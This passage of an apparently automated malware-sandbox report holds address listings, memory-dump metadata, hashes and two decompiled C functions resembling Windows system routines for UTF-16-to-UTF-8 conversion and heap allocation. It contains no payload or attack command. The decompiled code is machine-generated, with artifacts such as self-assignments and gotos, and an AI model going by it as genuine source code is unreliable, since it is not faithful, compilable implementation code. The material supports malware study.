                                                0x0095b4b4
                                                0x0095b49a
                                                0x0095b4b6
                                                0x0095b4ba
                                                0x0095b4ed
                                                0x0095b4ed
                                                0x0095b4fc
                                                0x0095b4ff
                                                0x00000000
                                                0x0095b505
                                                0x00000000
                                                0x0095b4bc
                                                0x00000000
                                                0x0095b4c1
                                                0x0095b4c5
                                                0x0095b4c7
                                                0x0095b4dc
                                                0x0095b4e1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095b4e1
                                                0x0095b4c7
                                                0x0095b4e3
                                                0x0095b4e7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095b4e7
                                                0x0095b47f
                                                0x0095b3c6
                                                0x0095b3cb
                                                0x0095b3d0
                                                0x0095b3d5
                                                0x0095b3da
                                                0x0095b3dd
                                                0x0095b3e7
                                                0x0095b3eb
                                                0x0095b3ec
                                                0x0095b3ec
                                                0x0095b3ec
                                                0x0095b3f1
                                                0x0095b3f4
                                                0x0095b3f4
                                                0x0095b3fa
                                                0x00000000
                                                0x0095b400
                                                0x0095b400
                                                0x0095b403
                                                0x0095b407
                                                0x0095b40c
                                                0x0095b40e
                                                0x0095b410
                                                0x0095b415
                                                0x00000000
                                                0x00000000
                                                0x0095b41b
                                                0x0095b41d
                                                0x0095b41d
                                                0x0095b425
                                                0x00000000
                                                0x00000000
                                                0x0095b427
                                                0x0095b42c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095b42c
                                                0x0095b41d
                                                0x0095b42e
                                                0x0095b432
                                                0x0095b459
                                                0x0095b459
                                                0x0095b468
                                                0x0095b46b
                                                0x00000000
                                                0x0095b46d
                                                0x0095b46b
                                                0x0095b434
                                                0x0095b434
                                                0x00000000
                                                0x0095b43c
                                                0x0095b440
                                                0x0095b442
                                                0x0095b442
                                                0x0095b44a
                                                0x00000000
                                                0x00000000
                                                0x0095b44c
                                                0x0095b451
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095b451
                                                0x0095b442
                                                0x0095b453
                                                0x0095b457
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095b457
                                                0x0095b403
                                                0x0095b3fa
                                                0x008ffc7f
                                                0x008ffc82
                                                0x0092aed3
                                                0x00000000
                                                0x0092aed9
                                                0x0092aed9
                                                0x0092aedc
                                                0x0092aedf
                                                0x0092af2b
                                                0x0092af2b
                                                0x0092af2f
                                                0x0092af37
                                                0x0095b535
                                                0x0095b537
                                                0x0095b541
                                                0x0095b548
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0095b548
                                                0x0095b537
                                                0x0095b54a
                                                0x0095b54e
                                                0x00000000
                                                0x0095b554
                                                0x00000000
                                                0x0095b554
                                                0x0092af3d
                                                0x0092af40
                                                0x0092aefa
                                                0x0092af04
                                                0x0092af0b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0092af0b
                                                0x00000000
                                                0x0092af42
                                                0x0092af0d
                                                0x0092af11
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0092af11
                                                0x00000000
                                                0x0092af17
                                                0x0092af1a
                                                0x0092af1f
                                                0x0092af22
                                                0x00000000
                                                0x0092af2b
                                                0x008ffc88
                                                0x008ffc8b
                                                0x008ffc91
                                                0x0095b50d
                                                0x00000000
                                                0x0095b513
                                                0x0095b513
                                                0x0095b51c
                                                0x0095b51f
                                                0x0095b524
                                                0x0095b52a
                                                0x00000000
                                                0x0095b530
                                                0x00000000
                                                0x0095b530
                                                0x00000000
                                                0x0095b52a
                                                0x00000000
                                                0x0095b513
                                                0x008ffc97
                                                0x008ffc9a
                                                0x009120c6
                                                0x009120c6
                                                0x008ffca0
                                                0x008ffca0
                                                0x008ffca5
                                                0x008ffca8
                                                0x008ffcad
                                                0x008ffcb3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008ffcb3
                                                0x008ffcb5
                                                0x008ffcb8
                                                0x00000000
                                                0x008ffcbe
                                                0x008ffcc3
                                                0x008ffcc9
                                                0x0095b55e
                                                0x0095b55e
                                                0x008ffcd5
                                                0x008ffcd8
                                                0x008ffcd8
                                                0x008ffcb8
                                                0x008ffc9a
                                                0x008ffc91
                                                0x008ffc82
                                                0x008ffc79
                                                0x008ffc32
                                                0x008ffc1f
                                                0x008ffcdd
                                                0x008ffcde
                                                0x008ffce1
                                                0x008ffce8
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 397d06212161787eebf14fdd92e747868fd8e6618a75ad84f794394cdd8676f7
                                                • Instruction ID: 815a173e2e4f51d73dcd08428e08cafe26285d3596d268bee26c922300e890d1
                                                • Opcode Fuzzy Hash: 397d06212161787eebf14fdd92e747868fd8e6618a75ad84f794394cdd8676f7
                                                • Instruction Fuzzy Hash: 71916D71D0026E8BCF34EFA5C4402BDB7B5FF54701F94442AD982AB296E7349986CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00927B00, Relevance: .3, Instructions: 252COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 99%
                                                			E00927B00(void* __ecx, void* __edi, void* __esi, signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed char _a16, unsigned int _a20) {
				signed int _v8;
				intOrPtr _t44;
				unsigned int _t45;
				void* _t52;
				unsigned int _t53;
				signed char _t59;
				signed char _t63;
				signed int _t66;
				signed int _t67;
				signed int _t69;
				signed int _t72;
				signed short _t73;
				signed char _t78;
				signed int* _t89;
				signed short* _t91;
				signed int _t92;
				signed int _t96;
				signed int _t99;
				signed int _t105;
				signed int _t109;
				unsigned int _t111;
				void* _t127;

				_push(__ecx);
				_t78 = _a16;
				_t92 = 0;
				_v8 = 0;
				if(_t78 == 0) {
					_t44 = 0xc00000f2;
					L20:
					return _t44;
				}
				_t89 = _a4;
				if(_t89 == 0) {
					if(_a12 == 0) {
						_t44 = 0xc000000d;
					} else {
						_t44 = L00927BF9(_t89, _t78, _a20, _a12);
					}
					goto L20;
				}
				_t45 = _a20;
				if((_t45 & 0x00000001) != 0) {
					_t44 = 0xc00000f3;
					goto L20;
				} else {
					_a20 = _t78 + (_t45 >> 1) * 2;
					_a16 = _a8 + _t89;
					while(1) {
						L4:
						L5:
						while(1) {
							L5:
							while(1) {
								L5:
								if(_t78 >= _a20) {
									if(_t92 <= 0) {
										L18:
										_t44 = _v8;
										L19:
										 *_a12 = _t89 - _a4;
										goto L20;
									}
									L9:
									_t14 = _t92 - 0xd800; // -55296
									if(_t14 <= 0x7ff) {
										_v8 = 0x107;
										_t92 = 0xfffd;
									}
									_t52 = 1;
									if(_t92 > 0x7f) {
										if(_t92 > 0x7ff) {
											if(_t92 > 0xffff) {
												_t52 = 2;
											}
											_t52 = _t52 + 1;
										}
										_t52 = _t52 + 1;
									}
									if(_t89 > _a16 - _t52) {
										_t44 = 0xc0000023;
										goto L19;
									} else {
										if(_t92 > 0x7f) {
											_t53 = _t92;
											if(_t92 > 0x7ff) {
												if(_t92 > 0xffff) {
													 *_t89 = _t53 >> 0x00000012 | 0x000000f0;
													_t89 =  &(_t89[0]);
													_t59 = _t92 >> 0x0000000c & 0x0000003f | 0x00000080;
												} else {
													_t59 = _t53 >> 0x0000000c | 0x000000e0;
												}
												 *_t89 = _t59;
												_t89 =  &(_t89[0]);
												_t63 = _t92 >> 0x00000006 & 0x0000003f | 0x00000080;
											} else {
												_t63 = _t53 >> 0x00000006 | 0x000000c0;
											}
											 *_t89 = _t63;
											_t89 =  &(_t89[0]);
											_t92 = _t92 & 0x0000003f | 0x00000080;
										}
										 *_t89 = _t92;
										_t89 =  &(_t89[0]);
										_t66 = _a20 - _t78 >> 1;
										_t96 = _a16 - _t89;
										if(_t66 > 0xd) {
											if(_t96 < _t66) {
												_t66 = _t96;
											}
											_t127 = _t78 + _t66 * 2 - 0xa;
											L27:
											while(_t78 < _t127) {
												_t69 =  *_t78 & 0x0000ffff;
												_t78 = _t78 + 2;
												if(_t69 > 0x7f) {
													L39:
													if(_t69 > 0x7ff) {
														if(_t69 - 0xd800 <= 0x7ff) {
															if(_t69 > 0xdbff) {
																_t78 = _t78;
																break;
															}
															_t99 =  *_t78 & 0x0000ffff;
															_t41 = _t99 - 0xdc00; // -54273
															_t78 = _t78 + 2;
															if(_t41 > 0x3ff) {
																_t78 = _t78 - 4;
																break;
															}
															_t69 = (_t69 << 0xa) + _t99 - 0x35fdc00;
															 *_t89 = _t69 >> 0x00000012 | 0x000000f0;
															_t89 =  &(_t89[0]);
															_t105 = _t69 & 0x0003f000 | 0x00080000;
															L67:
															 *_t89 = _t105 >> 0xc;
															_t127 = _t127;
															_t89 =  &(_t89[0]);
															_t109 = _t69 & 0x00000fc0 | 0x00002000;
															L41:
															_t127 = _t127;
															 *_t89 = _t109 >> 6;
															_t91 =  &(_t89[0]);
															_t72 = _t69 & 0x0000003f | 0x00000080;
															L42:
															 *_t91 = _t72;
															_t89 =  &(_t91[0]);
															continue;
														}
														_t105 = _t69 | 0x000e0000;
														goto L67;
													}
													_t109 = _t69 | 0x00003000;
													goto L41;
												}
												 *_t89 = _t69;
												_t89 =  &(_t89[0]);
												if((_t78 & 0x00000002) != 0) {
													_t69 =  *_t78 & 0x0000ffff;
													_t78 = _t78 + 2;
													if(_t69 > 0x7f) {
														goto L39;
													}
													 *_t89 = _t69;
													_t91 =  &(_t89[0]);
												}
												if(_t78 < _t127) {
													while(1) {
														_t111 =  *(_t78 + 4);
														_t73 =  *_t78;
														if(((_t111 | _t73) & 0xff80ff80) != 0) {
															break;
														}
														 *_t91 = _t73;
														_t91[1] = _t111;
														_t91[0] = _t73 >> 0x10;
														_t78 = _t78 + 8;
														_t91[1] = _t111 >> 0x10;
														_t91 =  &(_t91[2]);
														if(_t78 < _t127) {
															continue;
														}
														goto L27;
													}
													_t72 = _t73 & 0x0000ffff;
													_t78 = _t78 + 2;
													if(_t72 <= 0x7f) {
														goto L42;
													}
													goto L39;
												}
												break;
											}
											_t92 = 0;
											goto L4;
										} else {
											if(_t96 < _t66) {
												_t92 = 0;
												continue;
											}
											while(_t78 < _a20) {
												_t92 =  *_t78 & 0x0000ffff;
												_t78 = _t78 + 2;
												if(_t92 > 0x7f) {
													L8:
													_t13 = _t92 - 0xd800; // -55296
													if(_t13 <= 0x3ff) {
														goto L5;
													}
													goto L9;
												}
												 *_t89 = _t92;
												_t89 =  &(_t89[0]);
											}
											goto L18;
										}
									}
								}
								if(_t92 > 0) {
									_t67 =  *_t78 & 0x0000ffff;
									if(_t67 - 0xdc00 <= 0x3ff) {
										_t92 = (_t92 << 0xa) + _t67 - 0x35fdc00;
										_t78 = _t78 + 2;
									}
									goto L9;
								}
								_t92 =  *_t78 & 0x0000ffff;
								_t78 = _t78 + 2;
								goto L8;
							}
						}
					}
				}
			}

























                                                0x00927b05
                                                0x00927b07
                                                0x00927b0a
                                                0x00927b0c
                                                0x00927b11
                                                0x00960efa
                                                0x00927bd8
                                                0x00927bda
                                                0x00927bda
                                                0x00927b17
                                                0x00927b1c
                                                0x00927be0
                                                0x00960f04
                                                0x00927be6
                                                0x00927bed
                                                0x00927bed
                                                0x00000000
                                                0x00927be0
                                                0x00927b22
                                                0x00927b27
                                                0x00960f0e
                                                0x00000000
                                                0x00927b2d
                                                0x00927b32
                                                0x00927b3c
                                                0x00927b3f
                                                0x00927b3f
                                                0x00000000
                                                0x00927b44
                                                0x00000000
                                                0x00927b44
                                                0x00927b44
                                                0x00927b47
                                                0x00944263
                                                0x00927bcb
                                                0x00927bcb
                                                0x00927bce
                                                0x00927bd5
                                                0x00000000
                                                0x00927bd7
                                                0x00927b67
                                                0x00927b67
                                                0x00927b6f
                                                0x00960f3e
                                                0x00960f45
                                                0x00960f45
                                                0x00927b77
                                                0x00927b7b
                                                0x00960f51
                                                0x00960f59
                                                0x00960f5d
                                                0x00960f5d
                                                0x00960f5e
                                                0x00960f5e
                                                0x00960f5f
                                                0x00960f5f
                                                0x00927b88
                                                0x00944275
                                                0x00000000
                                                0x00927b8e
                                                0x00927b91
                                                0x00960f65
                                                0x00960f69
                                                0x00960f78
                                                0x00960f86
                                                0x00960f8f
                                                0x00960f90
                                                0x00960f7a
                                                0x00960f7d
                                                0x00960f7d
                                                0x00960f92
                                                0x00960f9b
                                                0x00960f9c
                                                0x00960f6b
                                                0x00960f6e
                                                0x00960f6e
                                                0x00960f9e
                                                0x00960fa3
                                                0x00960fa4
                                                0x00960fa4
                                                0x00927b9a
                                                0x00927ba1
                                                0x00927ba2
                                                0x00927ba4
                                                0x00927ba9
                                                0x0092dbf4
                                                0x00960fac
                                                0x00960fac
                                                0x0092dbfa
                                                0x00000000
                                                0x0092dc30
                                                0x0092dc34
                                                0x0092dc38
                                                0x0092dc3c
                                                0x00944289
                                                0x00944290
                                                0x00960fbb
                                                0x00960fcc
                                                0x00961020
                                                0x00000000
                                                0x00961020
                                                0x00960fce
                                                0x00960fd2
                                                0x00960fd8
                                                0x00960fdf
                                                0x00961026
                                                0x00000000
                                                0x00961026
                                                0x00960fe4
                                                0x00960ff3
                                                0x00960ffd
                                                0x00960ffe
                                                0x00961004
                                                0x00961007
                                                0x0096100c
                                                0x00961013
                                                0x00961014
                                                0x0094429e
                                                0x009442a2
                                                0x009442a3
                                                0x009442a7
                                                0x009442a8
                                                0x009442aa
                                                0x009442aa
                                                0x009442ac
                                                0x00000000
                                                0x009442ac
                                                0x00960fbf
                                                0x00000000
                                                0x00960fbf
                                                0x00944298
                                                0x00000000
                                                0x00944298
                                                0x0092dc42
                                                0x0092dc44
                                                0x0092dc48
                                                0x0094424f
                                                0x00944253
                                                0x00944257
                                                0x00000000
                                                0x00000000
                                                0x00944259
                                                0x0094425b
                                                0x0094425b
                                                0x0092dc50
                                                0x0092dc00
                                                0x0092dc00
                                                0x0092dc03
                                                0x0092dc0f
                                                0x00000000
                                                0x00000000
                                                0x0092dc15
                                                0x0092dc17
                                                0x0092dc20
                                                0x0092dc23
                                                0x0092dc26
                                                0x0092dc29
                                                0x0092dc2e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0092dc2e
                                                0x0094427f
                                                0x00944283
                                                0x00944287
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00944287
                                                0x00000000
                                                0x0092dc50
                                                0x0092dc52
                                                0x00000000
                                                0x00927baf
                                                0x00927bb1
                                                0x0094426e
                                                0x00000000
                                                0x0094426e
                                                0x00927bb7
                                                0x00927bbc
                                                0x00927bc0
                                                0x00927bc4
                                                0x00927b5a
                                                0x00927b5a
                                                0x00927b65
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00927b65
                                                0x00927bc6
                                                0x00927bc8
                                                0x00927bc8
                                                0x00000000
                                                0x00927bb7
                                                0x00927ba9
                                                0x00927b88
                                                0x00927b4f
                                                0x00960f18
                                                0x00960f27
                                                0x00960f31
                                                0x00960f38
                                                0x00960f38
                                                0x00000000
                                                0x00960f27
                                                0x00927b55
                                                0x00927b59
                                                0x00000000
                                                0x00927b59
                                                0x00927b44
                                                0x00927b44
                                                0x00927b3f

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7d8e1e2a5a6a4964145bdf9193a246bda9ec3521fead953568eb1d9add5f077b
                                                • Instruction ID: 6906f586abf54dfd67b27e93141903589081c38970a08bac95576863da7264da
                                                • Opcode Fuzzy Hash: 7d8e1e2a5a6a4964145bdf9193a246bda9ec3521fead953568eb1d9add5f077b
                                                • Instruction Fuzzy Hash: D871AE3160A2A6CFDB158E68C4C027E775AEBD2304B34C6B6E492DF64ED674C847E351
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008FE0C6, Relevance: .2, Instructions: 232COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 66%
                                                			E008FE0C6(unsigned int _a4, signed int _a8, signed int _a12) {
				char _v8;
				unsigned int _v12;
				unsigned int _v16;
				char _v20;
				signed int _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t108;
				intOrPtr _t110;
				signed int _t113;
				signed int _t116;
				signed int _t119;
				signed int _t123;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t130;
				unsigned int _t132;
				signed int* _t133;
				signed char _t135;
				void* _t136;
				signed int _t139;
				intOrPtr* _t140;
				intOrPtr _t145;
				unsigned int _t147;
				signed int _t149;
				signed char _t153;
				unsigned int _t156;
				unsigned int _t160;
				signed int _t162;
				signed int _t170;
				void* _t172;
				signed int _t174;
				unsigned int _t175;
				unsigned int _t177;

				_t175 = 0;
				_v12 = 0;
				if(_a12 > 0x7fffffff) {
					L33:
					_t174 = 0;
					__eflags = 0;
					L34:
					_t146 =  *[fs:0x18];
					_push(0xc0000017);
					 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc0000017;
					_t108 = E0090641D(__eflags);
					__eflags = _a8 & 0x00000004;
					 *((intOrPtr*)( *[fs:0x18] + 0x34)) = _t108;
					if((_a8 & 0x00000004) != 0) {
						_t116 = _v12;
						_v92 = _v92 & 0x00000000;
						_v96 = _v96 & 0x00000000;
						_v100 = 0xc0000017;
						_v84 = 1;
						__eflags = _t116;
						if(_t116 == 0) {
							_t116 = _a12;
						}
						_v80 = _t116;
						_push( &_v100);
						_v88 = E009338D8;
						E009338D8(_t146, _t148, _t163, _t174, 0xc0000017);
					}
					_t147 = _a4;
					L16:
					if( *0x7ffe0380 != 0) {
						_t110 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t110 + 0x240) & 0x00000001;
						if(( *(_t110 + 0x240) & 0x00000001) == 0) {
							goto L17;
						}
						__eflags =  *(_t147 + 0x44) & 0x01000000;
						if(( *(_t147 + 0x44) & 0x01000000) != 0) {
							goto L17;
						}
						__eflags = _a8 & 0x61000000;
						if((_a8 & 0x61000000) == 0) {
							L43:
							__eflags = _t174;
							if(_t174 == 0) {
								L50:
								E0099F387(_t147, _t174, _a12, _v20);
								goto L17;
							}
							_t79 = _t174 - 8; // -8
							_t113 = _t79;
							__eflags =  *((char*)(_t113 + 7)) - 5;
							_t149 = _t113;
							if( *((char*)(_t113 + 7)) == 5) {
								_t149 = _t149 - (( *(_t113 + 6) & 0x000000ff) << 3);
								__eflags = _t149;
							}
							__eflags =  *(_t149 + 7) & 0x00000080;
							if(( *(_t149 + 7) & 0x00000080) != 0) {
								goto L50;
							} else {
								__eflags =  *((char*)(_t113 + 7)) - 5;
								if( *((char*)(_t113 + 7)) == 5) {
									_t113 = _t113 - (( *(_t113 + 6) & 0x000000ff) << 3);
									__eflags = _t113;
								}
								_t153 =  *(_t147 + 0x4c) >> 0x00000014 &  *(_t147 + 0x52) >> 0x00000003 ^  *(_t113 + 2) >> 0x00000003;
								__eflags = _t153 & 0x00000001;
								if((_t153 & 0x00000001) != 0) {
									goto L17;
								} else {
									goto L50;
								}
							}
						}
						__eflags = _a8 & 0x10000000;
						if((_a8 & 0x10000000) == 0) {
							goto L17;
						}
						goto L43;
					}
					L17:
					return _t174;
				}
				_t147 = _a4;
				_t119 =  *(_t147 + 0x44);
				_t156 =  *(_t147 + 0x5c);
				_a8 = _a8 | _t119;
				_v16 = _t156;
				if(_t156 != 0) {
					__eflags = _a8 & 0x3c000102;
					if(__eflags != 0) {
						L52:
						_v16 = _t175;
						goto L2;
					}
					__eflags = _t119 & 0x01000000;
					if(__eflags != 0) {
						goto L52;
					}
					_t139 = _t156 - 0x00000001 & 0x0000ffff;
					_v8 = 0;
					__eflags = _t139 -  *0x9d7990; // 0x3
					if(__eflags >= 0) {
						_t140 = 0;
						__eflags = 0;
					} else {
						_t140 =  *((intOrPtr*)(0x96de08 + _t139 * 4));
					}
					_t163 =  &_v8;
					_t148 = _t156 >> 0x10;
					__eflags =  *_t140(_t147, 1, _t156 >> 0x10,  &_v8);
					if(__eflags >= 0) {
						_t145 = (_v8 + 0x00000007 & 0xfffffff8) + 8;
						_a12 = _a12 + _t145;
						_v8 = _t145;
						goto L2;
					} else {
						goto L33;
					}
				}
				L2:
				if((_a8 & 0x7d810f61) != 0) {
					L18:
					_t163 = _a8 | 0x00000002;
					_t148 = _t147;
					_t174 = E00903040(_t147, _t147, _a8 | 0x00000002, _t173, _t175, __eflags, _a12, _v12, _t175,  &_v20);
					L14:
					if(_t174 == 0) {
						goto L34;
					}
					_t177 = _v16;
					if(_t177 != 0) {
						_t99 = _t177 - 1; // 0x7
						_t123 = _t99 & 0x0000ffff;
						__eflags = _t123 -  *0x9d7990; // 0x3
						if(__eflags >= 0) {
							_t124 = 0;
							__eflags = 0;
						} else {
							_t124 =  *((intOrPtr*)(0x96de08 + _t123 * 4));
						}
						_t148 = _t177 >> 0x10;
						_t125 =  *_t124(_t147, 2, _t177 >> 0x10, _t174);
						__eflags = _t125;
						if(_t125 >= 0) {
							_a12 = _a12 - _v8;
							_t174 = E00985955(_t147, _a8, _t174, _a12, _v8, _t177);
							goto L16;
						} else {
							_t174 = 0;
							E008FE025(_t148, _t147, 0, 0);
							goto L34;
						}
					}
					goto L16;
				}
				if(_a12 == _t175) {
					_t130 = 1;
				} else {
					_t130 = _a12;
				}
				_t132 = _t130 + 0x0000000f & 0xfffffff8;
				_v12 = _t132;
				_t133 =  *(_t147 + 0xb8);
				_t160 = _t132 >> 3;
				while(_t160 >= _t133[1]) {
					_t170 =  *_t133;
					__eflags = _t170;
					if(__eflags == 0) {
						_t160 = _t133[1] - 1;
						break;
					}
					_t133 = _t170;
				}
				_t172 = _t133[1] - 1;
				if(_t160 >= _t172) {
					_t175 = 0;
					__eflags =  *_t133;
					if(__eflags == 0) {
						goto L18;
					}
					__eflags = _t160 - _t172;
					if(__eflags == 0) {
						goto L8;
					}
					goto L18;
				}
				L8:
				_t162 = _t160 - _t133[5];
				if(_t133[2] != 0) {
					_t162 = _t162 + _t162;
				}
				_t175 = _t133[8] + _t162 * 4;
				if(_t175 == 0) {
					goto L18;
				} else {
					_t135 =  *(_t175 + 4);
					_t190 = _t135 & 0x00000001;
					if((_t135 & 0x00000001) == 0) {
						goto L18;
					}
					_t163 = _a12;
					_t148 = _t135 - 1;
					_v20 = 2;
					_t136 = E008FE2E9(_t147, _t135 - 1, _a12, _t173, _t175, _t190);
					_t173 = _t136;
					if(_t136 == 0) {
						goto L18;
					}
					if((_a8 & 0x00000008) != 0) {
						E008FDFC0(_t173, 0, _a12);
					}
					goto L14;
				}
			}












































                                                0x008fe0d0
                                                0x008fe0da
                                                0x008fe0dd
                                                0x0094d82e
                                                0x0094d82e
                                                0x0094d82e
                                                0x0094d830
                                                0x0094d836
                                                0x0094d842
                                                0x0094d843
                                                0x0094d849
                                                0x0094d84e
                                                0x0094d852
                                                0x0094d855
                                                0x0094d857
                                                0x0094d85a
                                                0x0094d85e
                                                0x0094d862
                                                0x0094d865
                                                0x0094d86c
                                                0x0094d86e
                                                0x0094d870
                                                0x0094d870
                                                0x0094d873
                                                0x0094d879
                                                0x0094d87a
                                                0x0094d881
                                                0x0094d881
                                                0x0094d886
                                                0x008fe199
                                                0x008fe1a0
                                                0x0094d894
                                                0x0094d897
                                                0x0094d89e
                                                0x00000000
                                                0x00000000
                                                0x0094d8a4
                                                0x0094d8ab
                                                0x00000000
                                                0x00000000
                                                0x0094d8b1
                                                0x0094d8b8
                                                0x0094d8c7
                                                0x0094d8c7
                                                0x0094d8c9
                                                0x0094d913
                                                0x0094d91b
                                                0x00000000
                                                0x0094d91b
                                                0x0094d8cb
                                                0x0094d8cb
                                                0x0094d8ce
                                                0x0094d8d2
                                                0x0094d8d4
                                                0x0094d8dd
                                                0x0094d8dd
                                                0x0094d8dd
                                                0x0094d8df
                                                0x0094d8e3
                                                0x00000000
                                                0x0094d8e5
                                                0x0094d8e5
                                                0x0094d8e9
                                                0x0094d8f2
                                                0x0094d8f2
                                                0x0094d8f2
                                                0x0094d908
                                                0x0094d90a
                                                0x0094d90d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0094d90d
                                                0x0094d8e3
                                                0x0094d8ba
                                                0x0094d8c1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0094d8c1
                                                0x008fe1a6
                                                0x008fe1ac
                                                0x008fe1ac
                                                0x008fe0e3
                                                0x008fe0e6
                                                0x008fe0e9
                                                0x008fe0ec
                                                0x008fe0ef
                                                0x008fe0f4
                                                0x0094d7e5
                                                0x0094d7ec
                                                0x0094d93c
                                                0x0094d93c
                                                0x00000000
                                                0x0094d93c
                                                0x0094d7f2
                                                0x0094d7f7
                                                0x00000000
                                                0x00000000
                                                0x0094d800
                                                0x0094d803
                                                0x0094d806
                                                0x0094d80c
                                                0x0094d817
                                                0x0094d817
                                                0x0094d80e
                                                0x0094d80e
                                                0x0094d80e
                                                0x0094d819
                                                0x0094d81d
                                                0x0094d826
                                                0x0094d828
                                                0x0094d92e
                                                0x0094d931
                                                0x0094d934
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0094d828
                                                0x008fe0fa
                                                0x008fe101
                                                0x00903419
                                                0x00903424
                                                0x0090342a
                                                0x00903431
                                                0x008fe186
                                                0x008fe188
                                                0x00000000
                                                0x00000000
                                                0x008fe18e
                                                0x008fe193
                                                0x0094d944
                                                0x0094d947
                                                0x0094d94a
                                                0x0094d950
                                                0x0094d95b
                                                0x0094d95b
                                                0x0094d952
                                                0x0094d952
                                                0x0094d952
                                                0x0094d960
                                                0x0094d967
                                                0x0094d969
                                                0x0094d96b
                                                0x0094d97f
                                                0x0094d992
                                                0x00000000
                                                0x0094d96d
                                                0x0094d96e
                                                0x0094d972
                                                0x00000000
                                                0x0094d972
                                                0x0094d96b
                                                0x00000000
                                                0x008fe193
                                                0x008fe10a
                                                0x00903caf
                                                0x008fe110
                                                0x008fe110
                                                0x008fe110
                                                0x008fe116
                                                0x008fe11b
                                                0x008fe11e
                                                0x008fe124
                                                0x008fe127
                                                0x00904231
                                                0x00904233
                                                0x00904235
                                                0x0090441d
                                                0x00000000
                                                0x0090441d
                                                0x0090423b
                                                0x0090423b
                                                0x008fe133
                                                0x008fe136
                                                0x00904403
                                                0x00904405
                                                0x00904407
                                                0x00000000
                                                0x00000000
                                                0x0090440d
                                                0x0090440f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00904415
                                                0x008fe13c
                                                0x008fe13c
                                                0x008fe143
                                                0x008fe145
                                                0x008fe145
                                                0x008fe14a
                                                0x008fe14f
                                                0x00000000
                                                0x008fe155
                                                0x008fe155
                                                0x008fe158
                                                0x008fe15a
                                                0x00000000
                                                0x00000000
                                                0x008fe160
                                                0x008fe163
                                                0x008fe166
                                                0x008fe16d
                                                0x008fe172
                                                0x008fe176
                                                0x00000000
                                                0x00000000
                                                0x008fe180
                                                0x009042fa
                                                0x009042ff
                                                0x00000000
                                                0x008fe180

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f29176e63138e2bbe9dbe162d9d726dce38ca7609dce9d142057181c5df25a0
                                                • Instruction ID: 98b9f7cd4f393c59c8ae081f33d6493adc0bece45e8e205d0ef9900e4b21e5d1
                                                • Opcode Fuzzy Hash: 8f29176e63138e2bbe9dbe162d9d726dce38ca7609dce9d142057181c5df25a0
